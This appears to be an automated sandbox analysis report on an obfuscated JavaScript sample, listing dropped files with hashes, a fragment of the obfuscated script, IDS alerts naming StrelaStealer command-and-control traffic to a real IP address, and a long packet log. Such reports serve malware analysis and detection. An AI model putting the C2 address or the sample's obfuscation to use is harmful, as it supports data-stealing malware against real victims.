                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                      Malicious:false
                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                      Category:dropped
                      Size (bytes):386528
                      Entropy (8bit):7.9736851559892425
                      Encrypted:false
                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                      Malicious:false
                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                      Category:dropped
                      Size (bytes):1419751
                      Entropy (8bit):7.976496077007677
                      Encrypted:false
                      SSDEEP:24576:/M7oMOWLaGZ4ZwYIGNP8dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RVWLaGZ4ZwZGm3mlind9i4ufFXpAXkru
                      MD5:E787F9888A1628BE8234F19E8EE26D68
                      SHA1:44D5180C06ADBBDAADDBCE350CE4DEC997CD83E5
                      SHA-256:3A09F3799148DA49F039A35AEDD22F368FB35B8D6022C4691C10606F704DAF80
                      SHA-512:EE9B602898706CC0F33AA570E29A79A58ED748E1B738D74DF0C8C8DF193E23421B47AC8C862623ED774289D94FA90662A4CC436B80479D6420433D81752E9CA9
                      Malicious:false
                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:PDF document, version 1.7
                      Category:dropped
                      Size (bytes):635764
                      Entropy (8bit):7.929592005409041
                      Encrypted:false
                      SSDEEP:12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ
                      MD5:91A2AF9E2A61ABF7D9977999FBF9879E
                      SHA1:F6E4FA02DD15B27F74553FB1B220A4D2DF385267
                      SHA-256:FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A
                      SHA-512:8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C
                      Malicious:true
                      Preview:%PDF-1.7.%.....1 0 obj.<< /Pages 3 0 R /Type /Catalog >>.endobj.2 0 obj.<< /Type /ObjStm /Length 56 /Filter /FlateDecode /N 1 /First 4 >>.stream.x.3V0.Q.w./.+Q0T...L)V.V0Q0P.R.U...,HU..HLO-V.....%0.mendstream.endobj.4 0 obj.<< /Contents 5 0 R /Group << /CS /DeviceRGB /I true /S /Transparency /Type /Group >> /MediaBox [ 0 0 594.96 840.96 ] /Parent 3 0 R /Resources 6 0 R /StructParents 0 /Type /Page >>.endobj.5 0 obj.<< /Filter /FlateDecode /Length 75 >>.stream.x.3T0.B]C aab.gi....U.e...E........\ E..&@yC.:.l.B.W.B!P9D..~...K>W ...&...endstream.endobj.6 0 obj.<< /ExtGState << /a0 << /CA 1 /ca 1 >> >> /XObject << /x7 7 0 R >> >>.endobj.7 0 obj.<< /BBox [ 0 0 595 841 ] /Filter /FlateDecode /Resources 8 0 R /Subtype /Form /Type /XObject /Length 59 >>.stream.x.+..T(..O/6PH/.*.2.4.4S0.B]......H...O..S.04Tp....B.....endstream.endobj.8 0 obj.<< /ExtGState << /a0 << /CA 1 /ca 1 >> /gs0 << /BM /Normal /CA 1.0 /SMask /None /ca 1.0 >> >> /XObject << /x11 9 0 R >> >>.endobj.9 0 obj.<< /BitsPerCo
                      Process:C:\Windows\System32\svchost.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):55
                      Entropy (8bit):4.306461250274409
                      Encrypted:false
                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                      Malicious:false
                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                      File type:ASCII text, with very long lines (37121), with CRLF line terminators
                      Entropy (8bit):4.9154056290578145
                      TrID:
                        File name:1475127682155276.js
                        File size:37'155 bytes
                        MD5:453599a731336818e0b53408cc447545
                        SHA1:f887fc09c17d9b2fc6e1a9306017c31c5bcc7d72
                        SHA256:22b518169a28cf8a86401430ef8812a420bb256ee20473c18d87e07295befe0f
                        SHA512:923c515a9ee1274ffe5ceab9a49d133bd706d25b19bc28e976da68cb6d6655c4bb9a6bf31f8d8bf3df26f9fec724c7cb0b885b9e4c0e36851ac7ef9b247f1e10
                        SSDEEP:768:edOZ7u+pqYfS/RD22J2njX0k7B9Z7u+paXe+pskl0mvAAKrUqZxJE6XwzJMOX0G+:SOJu+ppfMRPknjX0k7B9Ju+paXe+pso+
                        TLSH:E4F211D5FD5764DDACD33987D8B3006E49D9F878A38260592A01D2B862FECCB60C7276
                        File Content Preview:function iwidqi(){tffhcmqh=this;..tffhcmqh[qrwopi+dnmsqvrb+ycynfadj+dclgjxjjh](axywxtvq+ezyruylfk+axywxtvq+sdtuekh+axywxtvq+tediq+ksggplpo+hulpxtosg+oduuttsxs+jovcz+gfktuqsfp+oduuttsxs+rpfomulsk+gfktuqsfp+jovcz+afudagdm+qqsvbcys+rpfomulsk+pfurkv+oduuttsxs
                        Icon Hash:68d69b8bb6aa9a86
                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                         2025-01-15T08:13:08.891125+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.5 | 49704 | 193.143.1.205 | 80 | TCP
                         2025-01-15T08:13:08.891125+0100 | 2859560 | ETPRO MALWARE StrelaStealer CnC Activity - Requesting Decoy Payload (GET) | 1 | 192.168.2.5 | 49704 | 193.143.1.205 | 80 | TCP
                         2025-01-15T08:13:11.279119+0100 | 1810005 | Joe Security ANOMALY Microsoft Office WebDAV Discovery | 1 | 192.168.2.5 | 49705 | 193.143.1.205 | 8888 | TCP
                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                         Jan 15, 2025 08:13:08.045581102 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:08.050570965 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.050676107 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:08.057343960 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:08.062257051 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891019106 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891033888 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891043901 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891056061 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891067028 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891086102 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891096115 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891102076 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891105890 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891124964 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:08.891175985 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:08.891184092 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:08.891689062 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.891736984 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:08.896003962 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.896023035 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.896090031 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:08.951226950 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.951240063 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.951251030 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:08.951353073 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.019228935 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.019239902 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.019290924 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.019300938 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.019356966 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.019370079 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.019395113 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.019406080 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.019438028 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.019916058 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.019974947 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020144939 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.020159006 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020172119 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020183086 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020205975 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.020581961 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020593882 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020605087 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020628929 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.020653963 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.020659924 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020687103 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.020728111 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.021490097 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.021502018 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.021512032 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.021536112 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.021599054 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.021611929 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.021646976 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.040082932 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.040163994 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.040222883 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.263112068 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263123989 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263159990 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263164043 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263183117 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263192892 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263204098 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263215065 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263223886 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263307095 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263323069 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263333082 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263345003 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263361931 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.263361931 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.263458014 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263458967 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.263493061 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263504028 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263513088 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263523102 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263533115 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263539076 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263547897 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263560057 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263633013 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.263735056 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263746023 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263756037 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263766050 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263776064 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263783932 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.263794899 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263808012 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263820887 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.263830900 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263842106 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263847113 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.263853073 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.263879061 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.264255047 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264265060 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264276028 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264286995 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264296055 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264301062 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.264307976 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264319897 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264329910 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264333010 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.264339924 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.264341116 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264352083 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264363050 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                         Jan 15, 2025 08:13:09.264363050 CET | 49704 | 80 | 192.168.2.5 | 193.143.1.205
                         Jan 15, 2025 08:13:09.264374971 CET | 80 | 49704 | 193.143.1.205 | 192.168.2.5
                        Jan 15, 2025 08:13:09.264384985 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.264389038 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.264410973 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.264425993 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.264714003 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.264724970 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.264734030 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.264744997 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.264760971 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.264765978 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.264794111 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.264802933 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454010010 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454034090 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454045057 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454056025 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454075098 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454080105 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454087973 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454118013 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454128981 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454139948 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454140902 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454150915 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454178095 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454190016 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454190969 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454200029 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454301119 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454327106 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454339027 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454349041 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454360008 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454370022 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454372883 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454399109 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454411030 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454579115 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454591036 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454601049 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454610109 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454622984 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454633951 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454634905 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454648018 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454660892 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454662085 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.454673052 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.454705000 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.455084085 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.455095053 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.455106020 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.455130100 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.455199957 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.455209970 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.455219984 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.455225945 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.455239058 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.455276012 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.455369949 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.455414057 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.456032991 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.456043959 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.456053972 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.456098080 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.456185102 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.456196070 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.456206083 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.456224918 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.456258059 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.456284046 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.456347942 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.456391096 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.456995964 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457006931 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457017899 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457046032 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.457119942 CET8049704193.143.1.205192.168.2.5
